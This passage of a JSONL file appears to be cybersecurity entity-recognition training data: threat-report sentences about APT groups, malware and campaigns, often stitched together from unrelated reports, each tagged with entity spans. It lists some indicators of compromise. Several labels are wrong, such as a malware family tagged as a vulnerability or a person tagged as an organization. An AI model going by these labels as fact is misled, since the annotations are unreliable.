APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[182, 193]], "ORGANIZATION: Palo Alto": [[224, 233]], "THREAT_ACTOR: APT37": [[282, 287]], "ORGANIZATION: research fellow": [[299, 314]], "ORGANIZATION: advisory member": [[317, 332]], "ORGANIZATION: journalist": [[339, 349]], "ORGANIZATION: strategic organizations": [[413, 436]]}, "info": {"id": "cyberner_stix_train_000198", "source": "cyberner_stix_train"}} {"text": "It isn't clear why the attackers scanned for hosts with port 40 open because there isn't a common protocol assigned to this port .", "spans": {}, "info": {"id": "cyberner_stix_train_000199", "source": "cyberner_stix_train"}} {"text": "Email Security can block malicious emails sent by threat actors as part of their campaign . The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering , in addition to the active development of attacks , infrastructure and the use of new methods and techniques . The MOF file created by the VBScript is used as a persistence mechanism via Windows B-TOOL S-OS Management Instrumentation ( WMI ) Event Subscriptions . 
This CVE is in CISA 's Known Exploited Vulnerabilities Catalog Reference CISA 's BOD 22 - 01 and Known Exploited Vulnerabilities Catalog for further guidance and requirements .", "spans": {"THREAT_ACTOR: MuddyWaters group": [[96, 113]], "TOOL: MOF file": [[317, 325]], "TOOL: VBScript": [[341, 349]], "TOOL: WMI": [[438, 441]], "VULNERABILITY: CVE": [[471, 474]], "ORGANIZATION: CISA 's": [[481, 488], [539, 546]], "VULNERABILITY: Known Exploited Vulnerabilities": [[489, 520], [563, 594]]}, "info": {"id": "cyberner_stix_train_000200", "source": "cyberner_stix_train"}} {"text": "TeamViewer — This remote control and desktop-sharing tool has applications for legitimate and malicious system users .", "spans": {"TOOL: TeamViewer": [[0, 10]]}, "info": {"id": "cyberner_stix_train_000201", "source": "cyberner_stix_train"}} {"text": "Last month , QiAnXin captured multiple phishing emails sent by TA505 Group to target financial institutions . Additionally , these decoy documents are hosted on legitimate websites including a government website belonging to the Cambodia Government and in at least once case , Facebook .", "spans": {"ORGANIZATION: QiAnXin": [[13, 20]], "THREAT_ACTOR: TA505": [[63, 68]], "ORGANIZATION: financial": [[85, 94]], "FILEPATH: decoy documents": [[131, 146]], "ORGANIZATION: Cambodia Government": [[229, 248]], "ORGANIZATION: Facebook": [[277, 285]]}, "info": {"id": "cyberner_stix_train_000202", "source": "cyberner_stix_train"}} {"text": "The carrier can determine that the request originates from the user ’ s device , but does not require any interaction from the user that can not be automated . Periscope 's activity has previously been suspected of being linked to China , but now researchers believe their evidence links the operation to the Chinese state . FileTime Get time information about a file . 
While there may be other groups they want to target also , they tend to be more persistent .", "spans": {}, "info": {"id": "cyberner_stix_train_000203", "source": "cyberner_stix_train"}} {"text": "Although TA505 initially distributed Dridex botnet ID 125 , they were observed using botnet ID 220 in March 2015 and botnet ID 223 in December of that year .", "spans": {"THREAT_ACTOR: TA505": [[9, 14]], "MALWARE: Dridex": [[37, 43]]}, "info": {"id": "cyberner_stix_train_000204", "source": "cyberner_stix_train"}} {"text": "Pasting Bitly URLs , appended with a plus sign , into the address bar of a web browser reveals the full URL .", "spans": {"TOOL: Bitly": [[8, 13]]}, "info": {"id": "cyberner_stix_train_000205", "source": "cyberner_stix_train"}} {"text": "Now , they are expanding their activity to audiences all around the world . At the end of 2018 , the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims’ networks . APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets .", "spans": {"THREAT_ACTOR: cluster": [[101, 108]], "TOOL: CobaltStrike": [[133, 145]], "TOOL: Powershell": [[155, 165]], "THREAT_ACTOR: APT15": [[228, 233]], "MALWARE: Mimikatz": [[258, 266]]}, "info": {"id": "cyberner_stix_train_000206", "source": "cyberner_stix_train"}} {"text": "Since 2009 , HIDDEN COBRA actors have leveraged their capabilities to target and compromise a range of victims ; some intrusions have resulted in the Exfiltration of data while others have been disruptive in nature .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[13, 25]]}, "info": {"id": "cyberner_stix_train_000207", "source": "cyberner_stix_train"}} {"text": "This brand new malware has real potential to become the next big mobile malware , as it is under constant iterative improvements , abuses a critical operating system feature , and targets financial applications . 
Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx . A paper released today by our colleagues at Palo Alto Networks presented a portion of data on this crew under the label \" the Lotus Blossom Operation \" , likely named for the debug string present in much of the \" Elise \" codebase since at least 2012 : \" d:\\lstudio\\projects\\lotus\\… \" .", "spans": {"ORGANIZATION: Symantec": [[213, 221]], "TOOL: Trojan.Naid": [[285, 296]], "MALWARE: Backdoor.Moudoor": [[301, 317]], "TOOL: Aurora": [[336, 342]], "THREAT_ACTOR: Elderwood Gang": [[352, 366]], "THREAT_ACTOR: Hidden Lynx": [[376, 387]], "ORGANIZATION: Palo Alto Networks": [[434, 452]], "MALWARE: Elise": [[603, 608]]}, "info": {"id": "cyberner_stix_train_000208", "source": "cyberner_stix_train"}} {"text": "To protect yourself from these threats , FireEye suggests that users : Take caution before clicking any links where you are not sure about the origin . Organizations detected a compromise themselves in 62% of the cases that Mandiant worked in 2017 . We named this RAT \" JhoneRAT \" . When Bradshaw refused to sell the domain , he and his then - girlfriend were subject to an unrelenting campaign of online harassment and blackmail .", "spans": {"ORGANIZATION: FireEye": [[41, 48]], "ORGANIZATION: Mandiant": [[224, 232]], "TOOL: RAT": [[264, 267]], "MALWARE: JhoneRAT": [[270, 278]], "ORGANIZATION: Bradshaw": [[288, 296]], "ORGANIZATION: he and his then - girlfriend": [[326, 354]]}, "info": {"id": "cyberner_stix_train_000209", "source": "cyberner_stix_train"}} {"text": "This allows the “ boot ” module to execute the payloads when the infected application is started . Most modules were created in 2012 . To initiate process hollowing , the loader DLL E-TOOL targets two legitimate system processes , for example svchost.exe or nslookup.exe , and spawns them in a suspended state . 
Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest .", "spans": {"TOOL: process hollowing": [[147, 164]], "TOOL: the loader": [[167, 177]], "TOOL: DLL E-TOOL": [[178, 188]], "FILEPATH: svchost.exe": [[243, 254]], "FILEPATH: nslookup.exe": [[258, 270]], "MALWARE: NetSupport RAT": [[350, 364]]}, "info": {"id": "cyberner_stix_train_000210", "source": "cyberner_stix_train"}} {"text": "The Magnitude EK landing page consisted of CVE-2016-0189 , which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched . The group has been active since at least 2010 and was behind many previous attack campaigns resulting in the theft of massive amounts of data from the directors and managers of US-based defense contractors .", "spans": {"TOOL: Magnitude EK": [[4, 16]], "VULNERABILITY: CVE-2016-0189": [[43, 56]], "ORGANIZATION: FireEye": [[87, 94]], "TOOL: Neutrino Exploit Kit": [[112, 132]], "ORGANIZATION: defense contractors": [[342, 361]]}, "info": {"id": "cyberner_stix_train_000211", "source": "cyberner_stix_train"}} {"text": "Those permission shown in bold below are the most problematic : Allows an application to write to external storage . More importantly , one of these files also enables the download of TeamViewer , a remote access tool that gives threat actors remote control over the system . 
APT30 is a threat group suspected to be associated with the Chinese government .", "spans": {"TOOL: TeamViewer": [[184, 194]], "THREAT_ACTOR: threat actors": [[229, 242]], "THREAT_ACTOR: APT30": [[276, 281]], "ORGANIZATION: Chinese government": [[336, 354]]}, "info": {"id": "cyberner_stix_train_000212", "source": "cyberner_stix_train"}} {"text": "Gaza Cybergang Group 2 , also dubbed Desert Falcons , APT-C-23 , Arid Viper .", "spans": {"THREAT_ACTOR: Gaza Cybergang": [[0, 14]], "THREAT_ACTOR: Desert Falcons": [[37, 51]], "THREAT_ACTOR: APT-C-23": [[54, 62]], "THREAT_ACTOR: Arid Viper": [[65, 75]]}, "info": {"id": "cyberner_stix_train_000213", "source": "cyberner_stix_train"}} {"text": "CTU researchers have observed BRONZE PRESIDENT batch scripts named doc.bat , xls.bat , xlsx.bat , ppt.bat , pptx.bat , pdf.bat , and txt.bat .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: BRONZE PRESIDENT": [[30, 46]], "FILEPATH: doc.bat": [[67, 74]], "FILEPATH: xls.bat": [[77, 84]], "FILEPATH: xlsx.bat": [[87, 95]], "FILEPATH: ppt.bat": [[98, 105]], "FILEPATH: pptx.bat": [[108, 116]], "FILEPATH: pdf.bat": [[119, 126]], "FILEPATH: txt.bat": [[133, 140]]}, "info": {"id": "cyberner_stix_train_000214", "source": "cyberner_stix_train"}} {"text": "However , in 2013 , autonomous mobile banking Trojans developed further . One of the attacks used Tropic Trooper 's known Yahoyah malware , but the other attack deployed the widely available Poison Ivy RAT . On all machines the campaign ID matches the name of the targeted university and the C&C URLs are : If you are talking to someone who may be a target of commercial spyware ( i.e. 
, human rights journalists , activists , dissidents and lawyers )", "spans": {"TOOL: Yahoyah malware": [[122, 137]], "TOOL: C&C": [[292, 295]], "ORGANIZATION: human rights journalists": [[388, 412]], "ORGANIZATION: activists": [[415, 424]], "ORGANIZATION: dissidents": [[427, 437]], "ORGANIZATION: lawyers": [[442, 449]]}, "info": {"id": "cyberner_stix_train_000215", "source": "cyberner_stix_train"}} {"text": "It expects a json with url , class and method name . The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . However , we have also observed attacks against surrounding nations and beyond , including targets in India and the USA .", "spans": {"THREAT_ACTOR: group": [[57, 62]], "VULNERABILITY: Flash exploits": [[106, 120]], "TOOL: Carberp": [[138, 145]], "TOOL: JHUHUGIT downloaders": [[152, 172]]}, "info": {"id": "cyberner_stix_train_000216", "source": "cyberner_stix_train"}} {"text": "Originally targeting Western European banks , it has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . From early 2014 until December 2018 , ns0.idm.net.lb pointed to 194.126.10.18 , which appropriately enough is an Internet address based in Lebanon .", "spans": {"ORGANIZATION: banks": [[38, 43]], "TOOL: Emotet": [[162, 168]]}, "info": {"id": "cyberner_stix_train_000217", "source": "cyberner_stix_train"}} {"text": "eterno truecaller For each application on the list , the “ core ” module checks for a matching version and MD5 hash of the installed application , and also checks for the application running in the user-space . Moreover , they used the same exploit kit Niteris as that in the Corkow case . 
Based on Microsoft Defender ATP signals , SoftwareBundler : Win32/ICLoader and its variants are primarily used to drop and run the Dexphot B-MAL S-MAL installer . During the SolarWinds Compromise , APT29 used different compromised credentials for remote access and to move laterally .", "spans": {"VULNERABILITY: kit Niteris": [[249, 260]], "TOOL: Corkow": [[276, 282]], "TOOL: Microsoft Defender": [[299, 317]], "MALWARE: SoftwareBundler : Win32/ICLoader": [[332, 364]], "THREAT_ACTOR: the SolarWinds Compromise": [[460, 485]], "THREAT_ACTOR: APT29": [[488, 493]]}, "info": {"id": "cyberner_stix_train_000218", "source": "cyberner_stix_train"}} {"text": "This was used to bypass 2FA methods by intercepting the SMS messages coming from the bank and stealing the mTANs without the victim ’ s knowledge . We have previously observed APT19 steal data from law and investment firms for competitive economic purposes . Repeated targeting of Middle Eastern financial , energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34 .", "spans": {"THREAT_ACTOR: APT19": [[176, 181]], "ORGANIZATION: financial": [[296, 305]], "ORGANIZATION: energy": [[308, 314]], "ORGANIZATION: government organizations": [[319, 343]], "ORGANIZATION: FireEye": [[350, 357]], "THREAT_ACTOR: APT34": [[412, 417]]}, "info": {"id": "cyberner_stix_train_000219", "source": "cyberner_stix_train"}} {"text": "The key is the SHA256 hash of the hard-coded password .", "spans": {}, "info": {"id": "cyberner_stix_train_000220", "source": "cyberner_stix_train"}} {"text": "Standard browser search history Standard browser bookmarks Device handset metadata ; such as brand , display , hardware , manufacturer , product , serial , radio version , and SDK . Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \" [username]=>singleton-instance-mutex \" . It re-copies the DLL from the new buffer to the original one using the memcpy function . 
CL0P used separate zero - days in GoAnywhere MFT and MOVEit Transfer to gain an edge .", "spans": {"ORGANIZATION: Kazuar": [[182, 188]], "TOOL: DLL": [[340, 343]], "THREAT_ACTOR: CL0P": [[412, 416]], "MALWARE: separate zero - days": [[422, 442]], "TOOL: GoAnywhere MFT": [[446, 460]], "TOOL: MOVEit Transfer": [[465, 480]]}, "info": {"id": "cyberner_stix_train_000221", "source": "cyberner_stix_train"}} {"text": "This would be a very unusual coincidence . A very good analysis and overview of the BlackEnergy attacks in Ukraine throughout 2014 and 2015 was published by the Ukrainian security firm Cys Centrum the text is only available in Russian for now , but can be read via Google Translate . It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes .", "spans": {"ORGANIZATION: Cys Centrum": [[185, 196]], "THREAT_ACTOR: ScarCruft": [[295, 304]]}, "info": {"id": "cyberner_stix_train_000222", "source": "cyberner_stix_train"}} {"text": "In subsequent discussion , FireEye personnel indicate that there was not “ an avalanche of evidence to substantiate ” anything more than “ TRITON actor ” – summing matters by indicating this term “ is the best we ’ve got for the public for now ” .", "spans": {"ORGANIZATION: FireEye": [[27, 34]], "MALWARE: TRITON": [[139, 145]]}, "info": {"id": "cyberner_stix_train_000223", "source": "cyberner_stix_train"}} {"text": "The malicious library is loaded from Eventbot ’ s assets that contain a font file called default.ttf which is actually the hidden library and then decoded using RC4 . However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit (CVE-2018-0798) . APT35 typically targets U.S. 
and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors .", "spans": {"MALWARE: Eventbot": [[37, 45]], "ORGANIZATION: we": [[205, 207]], "MALWARE: AsyncRAT": [[271, 279]], "THREAT_ACTOR: APT35": [[353, 358]], "ORGANIZATION: military": [[405, 413]], "ORGANIZATION: diplomatic": [[416, 426]], "ORGANIZATION: government personnel": [[431, 451]], "ORGANIZATION: organizations": [[454, 467]], "ORGANIZATION: media": [[475, 480]], "ORGANIZATION: energy": [[483, 489]], "ORGANIZATION: defense industrial base": [[494, 517]], "ORGANIZATION: DIB": [[520, 523]], "ORGANIZATION: engineering": [[532, 543]], "ORGANIZATION: business services": [[546, 563]], "ORGANIZATION: telecommunications sectors": [[568, 594]]}, "info": {"id": "cyberner_stix_train_000224", "source": "cyberner_stix_train"}} {"text": "Once the Barium Defendants have access to a victim computer through the malware described above , they monitor the victim 's activity and ultimately search for and steal sensitive documents ( for example , exfiltration of intellectual property regarding technology has been seen ) , and personal information fi\"om the victim 's network . CTU researchers have evidence that the threat group compromised U.S. 
and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations .", "spans": {"ORGANIZATION: technology": [[254, 264], [545, 555]], "ORGANIZATION: CTU": [[338, 341]], "ORGANIZATION: manufacturing": [[457, 470]], "ORGANIZATION: aerospace": [[486, 495]], "ORGANIZATION: defense contractors": [[508, 527]], "ORGANIZATION: automotive": [[532, 542]], "ORGANIZATION: energy": [[558, 564]], "ORGANIZATION: pharmaceuticals": [[571, 586]], "ORGANIZATION: education": [[591, 600]], "ORGANIZATION: legal": [[607, 612]]}, "info": {"id": "cyberner_stix_train_000225", "source": "cyberner_stix_train"}} {"text": "Based on the leaked code , the RCSAndroid app can do the following intrusive routines to spy on targets : Capture screenshots using the “ screencap ” command and framebuffer direct reading Monitor clipboard content Collect passwords for Wi-Fi networks and online acco ; .unts , including Skype , Facebook , Twitter , Google , WhatsApp , Mail , and LinkedIn Record using the microphone Collect SMS , MMS , and Gmail messages Record location Gather device information Capture photos using the front and back cameras Collect contacts and decode Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . 
of a function obfuscated with control flow flattening has a loop structure starting with yellow-colored “ control flow dispatcher ” None Follow Microsoft recommendations to disable remote PowerShell for non - administrative users where possible .", "spans": {"MALWARE: RCSAndroid": [[31, 41]], "SYSTEM: Skype": [[288, 293]], "SYSTEM: Facebook": [[296, 304]], "SYSTEM: Twitter": [[307, 314]], "SYSTEM: Google": [[317, 323]], "SYSTEM: WhatsApp": [[326, 334]], "SYSTEM: Mail": [[337, 341]], "SYSTEM: LinkedIn": [[348, 356]], "SYSTEM: Gmail": [[409, 414]], "VULNERABILITY: Carbanak": [[542, 550]], "TOOL: Carberp": [[593, 600]], "THREAT_ACTOR: espionage": [[618, 627]]}, "info": {"id": "cyberner_stix_train_000226", "source": "cyberner_stix_train"}} {"text": "The sexually explicit images in this screenshot have been covered with a black box . Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal here using hxxp://voguextra.com/decoy.doc . RASPITE 's activity to date currently focuses on initial access operations within the electric utility sector .", "spans": {"ORGANIZATION: Bellingcat": [[85, 95]], "MALWARE: decoy documents": [[164, 179]], "MALWARE: hxxp://voguextra.com/decoy.doc": [[217, 247]], "THREAT_ACTOR: RASPITE": [[250, 257]], "ORGANIZATION: electric utility sector": [[336, 359]]}, "info": {"id": "cyberner_stix_train_000227", "source": "cyberner_stix_train"}} {"text": "The download is initiated upon receiving json with a “ download ” command , which includes the URL of the file to be downloaded .", "spans": {}, "info": {"id": "cyberner_stix_train_000228", "source": "cyberner_stix_train"}} {"text": "Perhaps the most interesting part is that the attack e-mails had an APK attachment – a malicious program for Android . 
PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . This Naikon report will be complemented by a follow-on report that will examine the Naikon TTP and the incredible volume of attack activity around the South China Sea that has been going on since at least 2010 .", "spans": {"SYSTEM: Android": [[109, 116]], "TOOL: PIVY": [[119, 123], [385, 389]], "ORGANIZATION: chemical makers": [[197, 212]], "ORGANIZATION: government agencies": [[215, 234]], "ORGANIZATION: defense contractors": [[237, 256]], "THREAT_ACTOR: attackers": [[327, 336]], "VULNERABILITY: zero-day vulnerability": [[344, 366]], "THREAT_ACTOR: Naikon": [[405, 411], [484, 490]]}, "info": {"id": "cyberner_stix_train_000229", "source": "cyberner_stix_train"}} {"text": "This technique listens for NBT-NS ( UDP ) broadcasts from victim computers attempting to connect to network resources .", "spans": {"TOOL: NBT-NS": [[27, 33]]}, "info": {"id": "cyberner_stix_train_000230", "source": "cyberner_stix_train"}} {"text": "THE CAMPAIGN The malware 's primary infection vector is SMS . The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro similarly detailing the use of EvilGrab malware . OceanLotus : 11b4c284b3c8b12e83da0b85f59a589e8e46894fa749b847873ed6bab2029c0f Payload PNG ( loader #2 ) . 
Threat actors are always looking to expand the strategies they use , thus security practices and solutions that work for less organized cybercriminals might not work for determined groups who are willing to spend time , resources and manpower to accomplish their goals .", "spans": {"THREAT_ACTOR: threat actor": [[66, 78], [222, 234]], "ORGANIZATION: FireEye": [[184, 191]], "TOOL: Poison Ivy malware family": [[249, 274]], "ORGANIZATION: Trend Micro": [[293, 304]], "TOOL: EvilGrab malware": [[336, 352]], "THREAT_ACTOR: OceanLotus": [[355, 365]], "FILEPATH: 11b4c284b3c8b12e83da0b85f59a589e8e46894fa749b847873ed6bab2029c0f": [[368, 432]], "THREAT_ACTOR: Threat actors": [[461, 474]]}, "info": {"id": "cyberner_stix_train_000231", "source": "cyberner_stix_train"}} {"text": "The attackers described in this document use a very basic delivery platform ; compressed self-extracting archives sometimes sent to a large number of recipients .", "spans": {}, "info": {"id": "cyberner_stix_train_000232", "source": "cyberner_stix_train"}} {"text": "null is not the only payload opening a shell on the phone . By targeting all of these organizations together , Suckfly could have had a much larger impact on India and its economy . While the majority of infections in this campaign did not originate from Malicious Microsoft Word document , the Cybereason Nocturnus team found several weaponized Microsoft Word document with an embedded downloader macro E-TOOL that downloads and installs the backdoor used in this attack . 
The intent of cybercriminals may be evaluated during the research stage of the cyberattack kill chain where they investigate potential entry points , and collect data about the company , users and technology systems in place .", "spans": {"TOOL: Malicious Microsoft Word document": [[255, 288]], "ORGANIZATION: Cybereason Nocturnus": [[295, 315]], "TOOL: weaponized Microsoft Word document": [[335, 369]], "TOOL: downloader": [[387, 397]], "TOOL: macro E-TOOL": [[398, 410]], "MALWARE: backdoor": [[443, 451]]}, "info": {"id": "cyberner_stix_train_000233", "source": "cyberner_stix_train"}} {"text": "The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: military": [[92, 100]], "ORGANIZATION: organizations": [[101, 114]], "VULNERABILITY: CVE-2012-0158": [[198, 211]]}, "info": {"id": "cyberner_stix_train_000234", "source": "cyberner_stix_train"}} {"text": "In our 2014 report , we identified APT28 as a suspected Russian government-sponsored espionage actor .", "spans": {"THREAT_ACTOR: APT28": [[35, 40]]}, "info": {"id": "cyberner_stix_train_000235", "source": "cyberner_stix_train"}} {"text": "In some cases , sophisticated web injects were used to trick victims into entering their 2FA codes directly into the web forms controlled by the malware to eliminate the need for the mobile malware component . In order to exfiltrate data from a network segment not connected to the Internet , the threat actor deployed a modified version of hTran . 
The OilRig group continues to remain a highly active adversary in the Middle East region .", "spans": {"THREAT_ACTOR: threat actor": [[297, 309]], "TOOL: hTran": [[341, 346]], "THREAT_ACTOR: OilRig group": [[353, 365]]}, "info": {"id": "cyberner_stix_train_000236", "source": "cyberner_stix_train"}} {"text": "The leaked RCSAndroid code is a commercial weapon now in the wild . To ensure remote access to the workstation of an employee at a target organization , the Cobalt group ( as in previous years ) uses Beacon , a Trojan available as part of commercial penetration testing software . The mapping can be created by checking the conditional jump instruction ( jnz ) For these reasons , OT defenders and asset owners should take mitigating actions against COSMICENERGY to preempt in the wild deployment and to better understand common features and capabilities that are frequently deployed in OT malware .", "spans": {"MALWARE: RCSAndroid code": [[11, 26]], "THREAT_ACTOR: Cobalt group": [[157, 169]], "TOOL: Beacon": [[200, 206]], "ORGANIZATION: OT defenders": [[381, 393]], "ORGANIZATION: asset owners": [[398, 410]], "MALWARE: COSMICENERGY": [[450, 462]], "MALWARE: OT malware": [[587, 597]]}, "info": {"id": "cyberner_stix_train_000237", "source": "cyberner_stix_train"}} {"text": "TA505 stopped distributing Dridex in July 2016 , relying almost exclusively on Locky through December of that year .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "MALWARE: Dridex": [[27, 33]], "MALWARE: Locky": [[79, 84]]}, "info": {"id": "cyberner_stix_train_000238", "source": "cyberner_stix_train"}} {"text": "In the most extreme case , the Dukes continued with their July 2015 CloudDuke campaign even after their activity had been outed by multiple security vendors .", "spans": {"THREAT_ACTOR: Dukes": [[31, 36]], "MALWARE: CloudDuke": [[68, 77]]}, "info": {"id": "cyberner_stix_train_000239", "source": "cyberner_stix_train"}} {"text": "TimerTask Figure 6 : The timer task . 
However , while activity involving known Buckeye tools ceased in mid-2017 , the Bemstour exploit tool and the DoublePulsar variant used by Buckeye continued to be used until at least September 2018 in conjunction with different malware . Sandworm Team is a Russian cyber espionage group that has operated since approximately 2009 .", "spans": {"THREAT_ACTOR: Buckeye": [[79, 86]], "TOOL: Bemstour exploit tool": [[118, 139]], "TOOL: DoublePulsar": [[148, 160]], "THREAT_ACTOR: Sandworm Team": [[276, 289]]}, "info": {"id": "cyberner_stix_train_000240", "source": "cyberner_stix_train"}} {"text": "While we cannot rule out the possibility that one or more CNIIHM employees could have conducted TEMP.Veles activity without their employer ’s approval , the details shared in this post demonstrate that this explanation is less plausible than TEMP.Veles operating with the support of the institute .", "spans": {"ORGANIZATION: CNIIHM": [[58, 64]], "THREAT_ACTOR: TEMP.Veles": [[96, 106], [242, 252]]}, "info": {"id": "cyberner_stix_train_000241", "source": "cyberner_stix_train"}} {"text": "Downeks .NET creates a file in the “ Appdata ” directory , based on certain properties of the machine .", "spans": {"MALWARE: Downeks .NET": [[0, 12]]}, "info": {"id": "cyberner_stix_train_000242", "source": "cyberner_stix_train"}} {"text": "The social engineering message includes a link that leads to a fake version of a popular app , using names like Runtastic , WhatsApp or Netflix . This campaign , first observed in 2010 , is believed to be operated by a well-funded group given how it appeared to have purchased the source code of the BIFROST backdoor , which the operators enhanced and created other tools from . This page used to offer no-ip type hosting and was widely used by malware authors . 
A browser redirects to this page but search engines do n't update their links to the resource ( in ' SEO - speak ' , it is said that the ' link - juice ' is not sent to the new URL ) .", "spans": {"SYSTEM: Runtastic": [[112, 121]], "SYSTEM: WhatsApp": [[124, 132]], "SYSTEM: Netflix": [[136, 143]], "TOOL: browser": [[465, 472]]}, "info": {"id": "cyberner_stix_train_000243", "source": "cyberner_stix_train"}} {"text": "The first CosmicDuke sample we observed after the initial research on CosmicDuke was a sample compiled on the 30th of July 2014 .", "spans": {"MALWARE: CosmicDuke": [[10, 20], [70, 80]]}, "info": {"id": "cyberner_stix_train_000244", "source": "cyberner_stix_train"}} {"text": "The /proc filesystem is now mounted with a hidepid=2 parameter , which means that the process can not access other process /proc/ [ pid ] directory . The attacks appear to be geopolitically motivated and target high profile organizations . A URL is randomly selected and the malware searches at that location for an encoded IP address located between two tags , “ @MICR0S0FT ” and “ C0RP0RATI0N ” . Once the infected system locates the C2 , it receives encrypted backdoors that are obfuscated within GIF files and disguised as pictures that appear on a victim - s machine .", "spans": {"ORGANIZATION: high profile organizations": [[211, 237]], "ORGANIZATION: infected system": [[408, 423]], "SYSTEM: C2": [[436, 438]]}, "info": {"id": "cyberner_stix_train_000245", "source": "cyberner_stix_train"}} {"text": "The Sogu gang , in contrast , use PDF and DOC files in very tailored , targeted emails .", "spans": {"ORGANIZATION: Sogu": [[4, 8]], "TOOL: PDF": [[34, 37]], "TOOL: DOC": [[42, 45]], "TOOL: emails": [[80, 86]]}, "info": {"id": "cyberner_stix_train_000246", "source": "cyberner_stix_train"}} {"text": "Extract the contacts list from the Facebook app . The Remsec malware used by Strider has a modular design . This backdoor allows attackers to spy on targeted victims . 
This includes hosting C&C domains that were used by Winnti such as mtrue.com , shenqi[.]kr and zhu[.]kr .", "spans": {"SYSTEM: Facebook app": [[35, 47]], "TOOL: Remsec malware": [[54, 68]], "THREAT_ACTOR: Strider": [[77, 84]], "MALWARE: backdoor": [[113, 121]]}, "info": {"id": "cyberner_stix_train_000247", "source": "cyberner_stix_train"}} {"text": "Further research found other Quasar examples , an attack earlier in the month 2016 on the same target :", "spans": {"MALWARE: Quasar": [[29, 35]]}, "info": {"id": "cyberner_stix_train_000248", "source": "cyberner_stix_train"}} {"text": "Figure 7 . All three waves involved a single spear phishing email that appeared to originate from a government agency based in the Middle East . ' 0401 ' : Saudi Arabia . ' 0801 ' : Iraq . ' 0c01 ' : Egypt . ' 1001 ' : Libya . ' 1401 ' : Algeria . ' 1801 ' : Morocco . ' 1c01 ' : Tunisia . ' 2001 ' : Oman . ' 2401 ' : Yemen . ' 2801 ' : Syria . ' 3801 ' : UAE . ' 3401 ' : Kuwait . ' 3c01 ' : Bahrain . ' 3001 ' : Lebanon . But , IOCs are not always easy to detect they can be as simple as metadata elements or incredibly complex malicious code and content samples .", "spans": {"ORGANIZATION: government agency": [[100, 117]]}, "info": {"id": "cyberner_stix_train_000249", "source": "cyberner_stix_train"}} {"text": "Corporate IoT – a path to intrusion .", "spans": {"TOOL: IoT": [[10, 13]]}, "info": {"id": "cyberner_stix_train_000250", "source": "cyberner_stix_train"}} {"text": "These devices became points of ingress from which the actor established a presence on the network and continued looking for further access .", "spans": {}, "info": {"id": "cyberner_stix_train_000251", "source": "cyberner_stix_train"}} {"text": "The certificates Blackfly stole were also from South Korean companies , primarily in the video game and software development industry . 
Dropbox has already taken down the links .", "spans": {"ORGANIZATION: companies": [[60, 69]], "ORGANIZATION: video game and software development industry": [[89, 133]], "TOOL: Dropbox": [[136, 143]]}, "info": {"id": "cyberner_stix_train_000252", "source": "cyberner_stix_train"}} {"text": "Additional language artifacts recovered from TEMP.Veles toolsets are also consistent with such a regional nexus .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[45, 55]]}, "info": {"id": "cyberner_stix_train_000253", "source": "cyberner_stix_train"}} {"text": "We surmise that the targeting of banks , media , and government agencies is conducted in support of APT38 's primary mission . We named it RedOctober because we started this investigation in October 2012 , an unusually hot month .", "spans": {"ORGANIZATION: banks": [[33, 38]], "ORGANIZATION: media": [[41, 46]], "ORGANIZATION: government agencies": [[53, 72]], "THREAT_ACTOR: APT38": [[100, 105]]}, "info": {"id": "cyberner_stix_train_000254", "source": "cyberner_stix_train"}} {"text": "In an e-mail , a Lookout representative stood by its analysis and said company researchers planned to publish an in-depth response in the coming days . Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government – commonly known as HARDRAIN . APT33 : 91.230.121.143 backupnet.ddns.net . The ads are very similar to other brand impersonation campaigns .", "spans": {"ORGANIZATION: Lookout": [[17, 24]], "ORGANIZATION: U.S. 
